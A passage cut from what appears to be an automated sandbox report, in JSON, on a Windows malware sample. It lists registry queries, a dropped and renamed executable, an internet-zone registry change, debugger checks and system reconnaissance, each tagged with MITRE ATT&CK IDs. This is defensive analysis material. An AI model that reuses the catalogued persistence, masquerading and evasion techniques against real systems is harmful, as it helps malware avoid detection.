\"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CMF\\CONFIG\"; Key: \"SYSTEM\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"DISABLE\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"SOURCEPATH\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"DEVICEPATH\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"COM+ENABLED\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"INPROCSERVER32\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"xagapalr.exe.67B73C88.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"xagapalr.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\xagapalr.exe]- [targetUID: 00000000-00003944]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"xagapalr.exe.67B73C88.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"xagapalr.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\xagapalr.exe]- [targetUID: 00000000-00003944]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\xagapalr.exe\" to \"%WINDIR%\\system32\\iemwdxzd\\xagapalr.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00000600-00000105-1042374 [PID: 600]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00000600-00000105-1359030 [PID: 600]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00000600-00000105-3067646 [PID: 600]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00000600-00000105-3293198 [PID: 600]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00000600-00000105-3702522 [PID: 600]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00000600-00000105-3904645 [PID: 600]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00000600-00000105-4566295 [PID: 600]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00004440-00000105-93368 [PID: 4440]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00004440-00000105-859214 [PID: 4440]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F9E0000\n \"xagapalr.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F9E0000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F9E0000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00000600-00000105-6853408", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" queries volume information of \"C:\\\" at 00000000-00002276-0000010C-1332279\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" queries volume information of \"C:\\\" at 00000000-00002276-0000010C-1333498\n \"xagapalr.exe\" queries volume information of \"C:\\\" at 00000000-00004084-0000010C-1819506\n \"xagapalr.exe\" queries volume information of \"C:\\\" at 00000000-00004084-0000010C-1820789\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004440-0000010C-68477\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004440-0000010C-1108640\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004440-0000010C-1619271\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004440-0000010C-1620647", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c3e7743792d75ffffffff0c0000004c623e771f792d75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e440000000000 (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031006c0600000088ea5477ecf91200b344886c88000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b4000a7dea138bcf51200616b400088000000f822410081a85477ecf9120000009001001ec600000200000800000030285f00 (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebcf76882329000030fd7f9a5c407700e0fd7fb0c96b014430fd7f00000000400000003f000000240000000030fd7fa4c96b01c15c407760824777240000000030fd7f9a5c407700e0fd7fc8c96b0157893f778083477713172e75d8ebcf76 (UID: 00000000-00002276)\n \"xagapalr.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000060dc1e003cfc3b00145c3f77435c3f7708fd3b000100000094011c0001000000bcfb3b00935c407740834777d4a03f774294577708fd3b00010000000100000070e01e00000000008cfb3b00bcfb3b0028fc3b0095e13b77066b5300feffffffd4a03f771bbe2d750000bc7600000000 (UID: 00000000-00004084)\n \"xagapalr.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c3e7743792d75ffffffff0c0000004c623e771f792d75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e2c0000000000 (UID: 00000000-00004084)\n \"netsh.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000600)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" queries volume information of \"C:\\\" at 00000000-00002276-0000010C-1332279\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" queries volume information of \"C:\\\" at 00000000-00002276-0000010C-1333498\n \"xagapalr.exe\" queries volume information of \"C:\\\" at 00000000-00004084-0000010C-1819506\n \"xagapalr.exe\" queries volume information of \"C:\\\" at 00000000-00004084-0000010C-1820789\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004440-0000010C-68477\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004440-0000010C-1108640\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004440-0000010C-1619271\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00004440-0000010C-1620647", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e8200fce2120080f4df76000082000000000089f4df7691f0a5380200000070e312006ce3120064e2120068e2120018e4120095e13b7761285300c0e21200c83ae97634e31200d58ce17670e3120004e3120042a4df76a802e97644e31200d2f4df76080000006ef5df7644f5df7629f1a5380200000070aa9e6f0000130026bb9e6f18e31200020000000000130070aa9e6f48e3120042a4df76a802e9768ce3120010a99e6f08000000e6a89e6f52eea1380200000070aa9e6f0000130026bb9e6fac0e8200780e820058e312008050aa6f18e41200f9f2a26f36a52d57 (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000392c29ce0300000044e56b0147cfd839d00e00008ce56b01c0e46b01590000000300000048e46b0150e46b0118e66b0150b8896ce3a43854feffffff98e56b016fe4886c392c29ce98e56b017ce4886c0600000000002e6a010000008fe4886c3333ff040600000002000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e56b01000000008e00000044e66b01feffffffcce56b01cf004077d6004077bdd107768e0000004700000044e66b0100000000a0e56b010000000008e66b01 (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600bc37d93944de6b016d82c776cc18290004010000 (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000370030006600370061003200630032003100390036003200630064006200610033006600300003000000000000000200000008222900d84b2300f86c21003200020001000000260200000b0000000000000000000000e04b2300f40100000a000000c0712100050000000000000032000000e8292900f0c86b01cc4140770822290028000000fc000000ff2b3f7781fc0776d8ebcf76ac0121000000210028003400010000000000000000000000040000000100000029002f00010000001a00000001000000000000000000000008702100f8070000200000000000000000000000 (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000210080e32b00000000003e00003e340000c0a8e52b0020fd2b0098812900f0010000000021000400000080e32b00acee6b0104643f7738012100e0633f77ddda0776000000000000210088e32b006dd15477dabcd6396cae86750000000000000000f401000020fd2b00d82f21000100000000002100500121000c00000088e32b00d82f2100020000021800000059200079820000000000000000000000030000004cee6b01820000007f070000000000005920007902000000c0755c7720fd2b0000000000c0755c7768ee6b01e830210000000000d82f2100c0ee6b01ff2b3f77 (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000002c5f33640300000044e56b0147cfd839d00f00008ce56b01c0e46b015b0000000300000048e46b0150e46b0118e66b0150b8896ce3a43854feffffff98e56b016fe4886c2c5f336498e56b017ce4886c8205000000002e6a010000008fe4886c3333ff048205000004000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100f8bc2b00000000006d00006d340000c020bf2b00a8fe2b0098372c00680300000000210000000200f8bc2b00acee6b0104643f7738012100e0633f77ddda0776000000000000210000bd2b006dd15477dabcd6396cae86750000000000000000e0000000a8fe2b00d82f21000100000000002100500121000c00000000bd2b00d82f21000200000218000000bf0200bdb10000000000000000000000030000004cee6b01b10000003f02000000000000652e004b31000000c0755c77c09c2c0000000000c0755c7768ee6b014030210000000000d82f2100c0ee6b01ff2b3f77 (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000033e3c7510300000044e56b0147cfd8398c0b00008ce56b01c0e46b015b0000000300000048e46b0150e46b0118e66b0150b8896ce3a43854feffffff98e56b016fe4886c33e3c75198e56b017ce4886c8205000000002e6a010000008fe4886c3333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00002276)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"cmd.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003944)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002276)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"IsWow64Process\" with parameter \"2276\" - (UID: 00000000-00002276)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"xagapalr.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetForegroundWindow\" (UID: 00000000-00002276)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00004440)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000600)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Path: 